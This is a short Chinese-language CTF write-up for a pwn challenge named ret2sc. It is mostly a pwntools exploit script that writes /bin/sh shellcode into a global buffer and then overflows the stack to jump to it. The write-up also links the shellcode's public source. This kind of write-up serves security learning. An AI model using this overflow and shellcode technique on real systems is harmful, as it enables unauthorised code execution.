Pwnctf ret2sc Writeup

kazma 成大資安社 創辦人/社長
  2023-12-20 22:57:23 2023-12-20 22:57:23 Created   2023-12-20 23:03:09 2023-12-20 23:03:09 Updated    

ret2sc

這題就是先把 shellcode 寫到 name 上,再跳上去就行,不過比較新的作業系統 bss 段沒有 x 權限,這邊就直接上 exploit.py:

1
2
3
4
5
6
7
8
9
10
from pwn import *

r = process('./ret2sc')

name = 0x601080
sc = b"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

r.sendlineafter(b':', sc)
r.sendlineafter(b':', b'a'*0x28 + p64(name))
r.interactive()

shellcode 是從這邊找的:
https://www.exploit-db.com/shellcodes/49770

Pwned !!!

  • Title: Pwnctf ret2sc Writeup
  • Author: kazma
  • Created at : 2023-12-20 22:57:23
  • Updated at : 2023-12-20 23:03:09
  • Link: https://kazma.tw/2023/12/20/Pwnctf-ret2sc-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf ret2sc Writeup
  1. ret2sc